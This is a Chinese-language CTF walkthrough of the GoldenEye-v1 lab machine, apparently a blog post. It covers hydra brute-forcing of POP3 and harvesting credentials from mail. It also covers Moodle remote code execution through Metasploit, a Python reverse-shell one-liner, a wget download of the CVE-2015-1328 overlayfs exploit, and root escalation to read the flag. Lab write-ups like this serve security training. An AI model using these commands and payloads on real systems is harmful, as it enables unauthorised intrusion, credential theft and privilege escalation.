1-GoldenEye-v1

这个靶机看了三四篇才打下来,还是自身实力不够,哈哈

前面正常使用nmap进行扫描

访问IP

boris

InvincibleHack3r

html解码

CTF在线工具-在线base编码|在线base解码|base16编码|base32编码|base64编码 (hiencode.com)

InvincibleHack3r

前往登录

再次查看网页源码

发现两个账号

Natalya
Boris

使用hydra爆破pop3

创建账号文件

touch user.txt

默认密码字典在这

使用这个密码字典就行

hydra 192.168.11.181 -s 55007 pop3 -L user.txt -P pass.txt

kali运行

nc 192.168.11.181 55007

user boris

pass secret1!

list

使用命令查看

RETR 是 FTP (File Transfer Protocol) 协议中的一个命令,用于从服务器检索(下载)文件。当你使用 FTP 客户端连接到一个 FTP 服务器,并且想要下载一个文件时,你就会用到 RETR 命令。

在 FTP 会话中,典型的 RETR 命令的使用方式如下:


RETR filename

这里的 filename 是你想要从服务器下载的文件名。FTP 客户端发送 RETR 命令给服务器后,服务器会开始将指定的文件通过数据连接传输给客户端。

retr 1

retr 2

retr 3

这个帐号没什么有用信息

换账号登录

user natalya

pass bird

list

retr 1

retr 2 发现账号密码

username: xenia

password: RCP90rulez!

在文件最后要指定hosts文件

在本机就是C:\Windows\System32\drivers\etc下的hosts

在kali就是/etc/hosts

访问http://severnaya-station.com/gnocertdir/

看来还有一个账户Doak

爆破密码

hydra -l doak -P fasttrack.txt -f 192.168.11.128 -s 55007 pop3

账号:doak

密码:goat

网页上登录不上去

继续尝试进行pop3的登录

nc 192.168.11.128 55007

user doak

pass goat

list

retr 1

发现账号密码

username: dr_doak

password: 4England!

去登录

发现一个路径

/dir007key/for-007.jpg

访问该图片未发现任何信息,将图片下载。Strings查看图片是否隐写字符串,发现一个很像base64的字符串,解码后得到密码”xWinter1995x!”。综合上面提示,得到该网页的一个用户口令”admin:xWinter1995x!”。

登录上去发现多了两个模块

打靶机最痛苦的事莫过于照着别人文档做都做不出来

咱们先根据大佬的思路来一遍

登陆后查看,未发现有更多的提示信息提供。但发现该网站是开源的在线学习教育平台,且版本为2.2.3,Build 20120514搜索一下这个框架开辟新思路。

Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers搜索moodle,发现3个可利用的模块。其中Moodle3.4.1 Remote Code Execution是php编写,无法在Metasploit中直接利用,不考虑;Modle 3.6.3在metasploit中无法找到,自行将该文件添加到metasploit模块中。这里有个小技巧,Tile(MeTasploit)是Metasploit可直接利用的模块

下载拖到kali桌面

sudo cp /home/kali/Desktop/29324.rb /usr/share/metasploit-framework/modules/exploits/multi/http/

复制rb文件到指定目录后,重启msfconsole,并reload_all重载所有模块,再次搜索即可查到该模块。

这里我没有改名,你们可以将cp的文件名改为moodle_cmd_exec

接下来使用我们的神器:MSF

msfconsole ---进入MSF框架攻击界面

search moodle ---查找 moodle类型 攻击的模块

use 0 ---调用0 exploit/multi/http/moodle_cmd_exec调用攻击脚本

set username admin ---设置用户名:admin

set password xWinter1995x! ---设置密码:xWinter1995x!

set rhost severnaya-station.com ---设置:rhosts severnaya-station.com

set targeturi /gnocertdir ---设置目录: /gnocertdir

set payload cmd/unix/reverse ---设置payload:cmd/unix/reverse

set lhost 192.168.4.231 ---设置:lhost 192.168.4.231(需要本地IP)

exploit ----执行命令



use exploit/multi/http/moodle_cmd_exec

msf exploit(moodle_cmd_exec) > set rhost severnaya-station.com

msf exploit(moodle_cmd_exec) > set targeturi /gnocertdir

msf exploit(moodle_cmd_exec) > set username admin

msf exploit(moodle_cmd_exec) > set password xWinter1995x!

执行tty,因为获得的权限无框架:执行

python -c 'import pty; pty.spawn("/bin/bash")' ---将shell进行tty

接下来反弹shell

python反弹shell

15、python反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.211.55.28",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

uname -a 查看权限!

Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

谷歌搜索:Linux ubuntu 3.13.0-32 exploit

获得exp版本:37292

--------------------------------------------------

CVE(CAN) ID: CVE-2015-1328

overlayfs文件系统是一种叠合式文件系统,实现了在底层文件系统上叠加另一个文件系统。Linux 内核3.18开始已经加入了对overlayfs的支持。Ubuntu Linux内核在更早的版本就已加入该支持。

Ubuntu Linux内核的overlayfs文件系统实现中存在一个权限检查漏洞,本地普通用户可以获取管理员权限。此漏洞影响所有目前官方支持的Ubuntu Linux版本,目前已经发布攻击代码,建议受影响用户尽快进行升级。

此漏洞源于overlayfs文件系统在上层文件系统目录中创建新文件时没有正确检查文件权限。它只检查了被修改文件的属主是否有权限在上层文件系统目录写入,导致当从底层文件系统目录中拷贝一个文件到上层文件系统目录时,文件属性也随同拷贝过去。如果Linux内核设置了CONFIG_USER_NS=y和FS_USERNS_MOUNT标志,将允许一个普通用户在低权限用户命名空间中mout一个overlayfs文件系统。本地普通用户可以利用该漏洞在敏感系统目录中创建新文件或读取敏感文件内容,从而提升到管理员权限。

---------------------------------------------------------------------------

kali搜索下:

searchsploit 37292

---搜索kali本地的exp库中37292攻击脚本信息

cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/桌面/ ---目录自行修改

我这里是

cp /usr/share/exploitdb/exploits/linux/local/37292.c /home/kali/Desktop

这个靶场在枚举信息知道:

无法进行GCC编译,需要改下脚本为cc

gedit 37292.c ---文本打开

第143行将gcc改为cc ---编写下

然后在本目录下开启http服务:python3 -m http.server 8081

在反弹shell执行:wget http://192.168.11.129:8081/37292.c

成功下载后执行cc编译:

cc -o exp 37292.c ---C语言的CC代码编译点c文件

chmod +x exp ---编译成可执行文件,并赋权

./exp ---点杠执行

id ---查看目前权限

cat /root/.flag.txt ---读取root下的flag信息

568628e0d993b1973adc718237da6e93

拿到flag

到这里打靶就结束了,但是我们的学习还没有结束,希望大家一起努力,加油各位

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值